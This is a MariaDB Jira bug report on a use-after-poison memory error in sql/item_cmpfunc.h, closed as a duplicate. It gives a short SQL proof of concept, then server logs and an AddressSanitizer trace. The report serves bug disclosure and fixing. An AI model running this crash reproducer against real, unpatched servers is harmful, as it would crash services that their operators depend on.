[MDEV-26408] use-after-poison security in sql/item_cmpfunc.h - Jira

XML

Word

Printable

Details

Type: Bug
Status: Closed (View Workflow)
Priority: Major
Resolution: Duplicate
Affects Version/s: 10.7
Fix Version/s: N/A
Component/s: Data Manipulation - Subquery
Labels:
None
Environment:
Linux version 5.13.0-1-MANJARO (builduser@LEGION) (gcc (GCC) 11.1.0, GNU ld (GNU Binutils) 2.36.1) #1 SMP PREEMPT Mon Jun 7 06:16:10 UTC 2021 x86_64

Description

PoC:

CREATE TEMPORARY TABLE v0 ( v1 CHAR , NEW INT AS ( CASE 'x' WHEN v1 = 'x' THEN v1 ELSE 'x' = FROM_UNIXTIME ( 2147483647 ) END ) ) ;

 UPDATE v0 SET v1 = 0 , v1 = 95 WHERE v1 = 5 AND v1 = -1 ;

 SELECT length ( least ( 'x' 'x' 'x' 'x' ^ 0 + 'x' ^ 79070223.000000 + 93 ^ 25145487.000000 + -128 ^ 72176287.000000 , 'x' ) ) FROM DUAL ;

 DELETE FROM v0 WHERE ( v1 , v1 ) IN ( ( 8 , 'x' ) , ( 45 , 'x' ) ) ORDER BY v1 , v1 LIMIT 15 ;

 SET GLOBAL READ_ONLY = YEAR ( str_to_date ( 'x' , NULL ) ) ;

 USE WARNINGS ;

Asan report:

2021-08-16 14:41:38 0 [Note] InnoDB: Compressed tables use zlib 1.2.11

2021-08-16 14:41:38 0 [Note] InnoDB: Number of pools: 1

2021-08-16 14:41:38 0 [Note] InnoDB: Using crc32 + pclmulqdq instructions

2021-08-16 14:41:38 0 [Note] mysqld: O_TMPFILE is not supported on /tmp (disabling future attempts)

2021-08-16 14:41:38 0 [Note] InnoDB: Using liburing

2021-08-16 14:41:38 0 [Note] InnoDB: Initializing buffer pool, total size = 134217728, chunk size = 134217728

2021-08-16 14:41:38 0 [Note] InnoDB: Completed initialization of buffer pool

2021-08-16 14:41:38 0 [Note] InnoDB: 128 rollback segments are active.

2021-08-16 14:41:38 0 [Note] InnoDB: Creating shared tablespace for temporary tables

2021-08-16 14:41:38 0 [Note] InnoDB: Setting file './ibtmp1' size to 12 MB. Physically writing the file full; Please wait ...

2021-08-16 14:41:38 0 [Note] InnoDB: File './ibtmp1' size is now 12 MB.

2021-08-16 14:41:38 0 [Note] InnoDB: 10.7.0 started; log sequence number 42161; transaction id 14

2021-08-16 14:41:38 0 [Note] InnoDB: Loading buffer pool(s) from /home/fuboat/mariadb-tmp/mysql-default-data/ib_buffer_pool

2021-08-16 14:41:38 0 [Note] Plugin 'FEEDBACK' is disabled.

2021-08-16 14:41:38 0 [Note] InnoDB: Buffer pool(s) load completed at 210816 14:41:38

2021-08-16 14:41:38 0 [Note] Server socket created on IP: '0.0.0.0'.

2021-08-16 14:41:38 0 [Note] Server socket created on IP: '::'.

2021-08-16 14:41:38 0 [Note] /usr/local/mysql/bin//mysqld: ready for connections.

Version: '10.7.0-MariaDB'  socket: '/tmp/0.socket'  port: 3306  Source distribution

2021-08-16 14:41:39 0 [Note] /usr/local/mysql/bin//mysqld (initiated by: root[root] @ localhost []): Normal shutdown

2021-08-16 14:41:39 0 [Note] InnoDB: FTS optimize thread exiting.

2021-08-16 14:41:39 0 [Note] InnoDB: Starting shutdown...

2021-08-16 14:41:39 0 [Note] InnoDB: Dumping buffer pool(s) to /home/fuboat/mariadb-tmp/mysql-default-data/ib_buffer_pool

2021-08-16 14:41:39 0 [Note] InnoDB: Buffer pool(s) dump completed at 210816 14:41:39

2021-08-16 14:41:39 0 [Note] InnoDB: Removed temporary tablespace data file: "./ibtmp1"

2021-08-16 14:41:39 0 [Note] InnoDB: Shutdown completed; log sequence number 42173; transaction id 15

2021-08-16 14:41:39 0 [Note] /usr/local/mysql/bin//mysqld: Shutdown complete

2021-08-16 14:55:18 0 [Note] InnoDB: Compressed tables use zlib 1.2.11

2021-08-16 14:55:18 0 [Note] InnoDB: Number of pools: 1

2021-08-16 14:55:18 0 [Note] InnoDB: Using crc32 + pclmulqdq instructions

2021-08-16 14:55:18 0 [Note] mysqld: O_TMPFILE is not supported on /tmp (disabling future attempts)

2021-08-16 14:55:18 0 [Note] InnoDB: Using liburing

2021-08-16 14:55:18 0 [Note] InnoDB: Initializing buffer pool, total size = 134217728, chunk size = 134217728

2021-08-16 14:55:18 0 [Note] InnoDB: Completed initialization of buffer pool

2021-08-16 14:55:28 0 [Note] InnoDB: 128 rollback segments are active.

2021-08-16 14:55:28 0 [Note] InnoDB: Creating shared tablespace for temporary tables

2021-08-16 14:55:28 0 [Note] InnoDB: Setting file './ibtmp1' size to 12 MB. Physically writing the file full; Please wait ...

2021-08-16 14:55:28 0 [Note] InnoDB: File './ibtmp1' size is now 12 MB.

2021-08-16 14:55:29 0 [Note] InnoDB: 10.7.0 started; log sequence number 42173; transaction id 14

2021-08-16 14:55:29 0 [Note] Plugin 'FEEDBACK' is disabled.

2021-08-16 14:55:29 0 [Note] InnoDB: Loading buffer pool(s) from /home/fuboat/mariadb-tmp/17/ib_buffer_pool

2021-08-16 14:55:29 0 [Note] Server socket created on IP: '0.0.0.0'.

2021-08-16 14:55:29 0 [Note] Server socket created on IP: '::'.

2021-08-16 14:55:29 0 [Note] InnoDB: Buffer pool(s) load completed at 210816 14:55:29

2021-08-16 14:55:29 0 [Note] /usr/local/mysql/bin//mysqld: ready for connections.

Version: '10.7.0-MariaDB'  socket: '/tmp/17.socket'  port: 10017  Source distribution

=================================================================

==3376229==ERROR: AddressSanitizer: use-after-poison on address 0x6290000889f8 at pc 0x560b3515065f bp 0x7f31f2db85d0 sp 0x7f31f2db85c0

READ of size 8 at 0x6290000889f8 thread T13

    #0 0x560b3515065e in Predicant_to_list_comparator::Predicant_to_value_comparator::cleanup() /experiment/mariadb-server/sql/item_cmpfunc.h:2105

    #1 0x560b3515065e in Predicant_to_list_comparator::cleanup() /experiment/mariadb-server/sql/item_cmpfunc.h:2214

    #2 0x560b3515065e in Item_func_case_simple::cleanup() /experiment/mariadb-server/sql/item_cmpfunc.h:2397

    #3 0x560b347a08c3 in Item::delete_self() /experiment/mariadb-server/sql/item.h:2522

    #4 0x560b347a08c3 in Query_arena::free_items() /experiment/mariadb-server/sql/sql_class.cc:3823

    #5 0x560b34bec7d8 in closefrm(TABLE*) /experiment/mariadb-server/sql/table.cc:4434

    #6 0x560b34ec50f4 in THD::close_temporary_table(TABLE*) /experiment/mariadb-server/sql/temporary_tables.cc:1238

    #7 0x560b34ec7464 in THD::close_temporary_tables() /experiment/mariadb-server/sql/temporary_tables.cc:531

    #8 0x560b347a19ef in THD::cleanup() /experiment/mariadb-server/sql/sql_class.cc:1549

    #9 0x560b345a51c4 in unlink_thd(THD*) /experiment/mariadb-server/sql/mysqld.cc:2686

    #10 0x560b34ca494b in do_handle_one_connection(CONNECT*, bool) /experiment/mariadb-server/sql/sql_connect.cc:1429

    #11 0x560b34ca533c in handle_one_connection /experiment/mariadb-server/sql/sql_connect.cc:1312

    #12 0x560b35735c2b in pfs_spawn_thread /experiment/mariadb-server/storage/perfschema/pfs.cc:2201

    #13 0x7f3212044258 in start_thread (/usr/lib/libpthread.so.0+0x9258)

    #14 0x7f3211bef5e2 in __GI___clone (/usr/lib/libc.so.6+0xfe5e2)

0x6290000889f8 is located 6136 bytes inside of 16400-byte region [0x629000087200,0x62900008b210)

allocated by thread T13 here:

    #0 0x7f32126d6279 in __interceptor_malloc /build/gcc/src/gcc/libsanitizer/asan/asan_malloc_linux.cpp:145

    #1 0x560b360689a8 in my_malloc /experiment/mariadb-server/mysys/my_malloc.c:90

    #2 0x560b36054e40 in reset_root_defaults /experiment/mariadb-server/mysys/my_alloc.c:243

    #3 0x560b347961b8 in THD::init_for_queries() /experiment/mariadb-server/sql/sql_class.cc:1405

    #4 0x560b34ca2d51 in prepare_new_connection_state(THD*) /experiment/mariadb-server/sql/sql_connect.cc:1240

    #5 0x560b34ca365f in thd_prepare_connection(THD*) /experiment/mariadb-server/sql/sql_connect.cc:1333

    #6 0x560b34ca365f in thd_prepare_connection(THD*) /experiment/mariadb-server/sql/sql_connect.cc:1322

    #7 0x560b34ca4e0a in do_handle_one_connection(CONNECT*, bool) /experiment/mariadb-server/sql/sql_connect.cc:1408

    #8 0x560b34ca533c in handle_one_connection /experiment/mariadb-server/sql/sql_connect.cc:1312

    #9 0x560b35735c2b in pfs_spawn_thread /experiment/mariadb-server/storage/perfschema/pfs.cc:2201

    #10 0x7f3212044258 in start_thread (/usr/lib/libpthread.so.0+0x9258)

Thread T13 created by T0 here:

    #0 0x7f3212677fa7 in __interceptor_pthread_create /build/gcc/src/gcc/libsanitizer/asan/asan_interceptors.cpp:216

    #1 0x560b35735ea9 in my_thread_create /experiment/mariadb-server/storage/perfschema/my_thread.h:48

    #2 0x560b35735ea9 in pfs_spawn_thread_v1 /experiment/mariadb-server/storage/perfschema/pfs.cc:2252

    #3 0x560b345a6b3c in inline_mysql_thread_create /experiment/mariadb-server/include/mysql/psi/mysql_thread.h:1139

    #4 0x560b345a6b3c in create_thread_to_handle_connection(CONNECT*) /experiment/mariadb-server/sql/mysqld.cc:5934

    #5 0x560b345b27b6 in handle_accepted_socket(st_mysql_socket, st_mysql_socket) /experiment/mariadb-server/sql/mysqld.cc:6055

    #6 0x560b345b336f in handle_connections_sockets() /experiment/mariadb-server/sql/mysqld.cc:6179

    #7 0x560b345b6a52 in mysqld_main(int, char**) /experiment/mariadb-server/sql/mysqld.cc:5829

    #8 0x7f3211b18b24 in __libc_start_main (/usr/lib/libc.so.6+0x27b24)

SUMMARY: AddressSanitizer: use-after-poison /experiment/mariadb-server/sql/item_cmpfunc.h:2105 in Predicant_to_list_comparator::Predicant_to_value_comparator::cleanup()

Shadow bytes around the buggy address:

  0x0c52800090e0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

  0x0c52800090f0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

  0x0c5280009100: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

  0x0c5280009110: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

  0x0c5280009120: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

=>0x0c5280009130: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7[f7]

  0x0c5280009140: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

  0x0c5280009150: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

  0x0c5280009160: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

  0x0c5280009170: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

  0x0c5280009180: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

Shadow byte legend (one shadow byte represents 8 application bytes):

  Addressable:           00

  Partially addressable: 01 02 03 04 05 06 07

  Heap left redzone:       fa

  Freed heap region:       fd

  Stack left redzone:      f1

  Stack mid redzone:       f2

  Stack right redzone:     f3

  Stack after return:      f5

  Stack use after scope:   f8

  Global redzone:          f9

  Global init order:       f6

  Poisoned by user:        f7

  Container overflow:      fc

  Array cookie:            ac

  Intra object redzone:    bb

  ASan internal:           fe

  Left alloca redzone:     ca

  Right alloca redzone:    cb

  Shadow gap:              cc

==3376229==ABORTING

GNU gdb (GDB) 10.2

Copyright (C) 2021 Free Software Foundation, Inc.

License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software: you are free to change and redistribute it.

There is NO WARRANTY, to the extent permitted by law.

Type "show copying" and "show warranty" for details.

This GDB was configured as "x86_64-pc-linux-gnu".

Type "show configuration" for configuration details.

For bug reporting instructions, please see:

<https://www.gnu.org/software/gdb/bugs/>.

Find the GDB manual and other documentation resources online at:

    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".

Type "apropos word" to search for commands related to "word"...

Reading symbols from /usr/local/mysql/bin//mysqld...

(gdb) (gdb) (gdb) quit

Attachments

Issue Links

duplicates

MDEV-26407 Server crashes in Item_func_in::cleanup/Item::cleanup_processor

Closed

Activity

People

Assignee:: Unassigned

Reporter:: Zhiyong Wu

Votes:: 0 Vote for this issue

Watchers:: 2 Start watching this issue

Dates

Created:: 2021-08-19 02:25

Updated:: 2021-08-27 13:39

Resolved:: 2021-08-27 13:39

Git Integration

Error rendering 'com.xiplink.jira.git.jira_git_plugin:git-issue-webpanel'. Please contact your Jira administrators.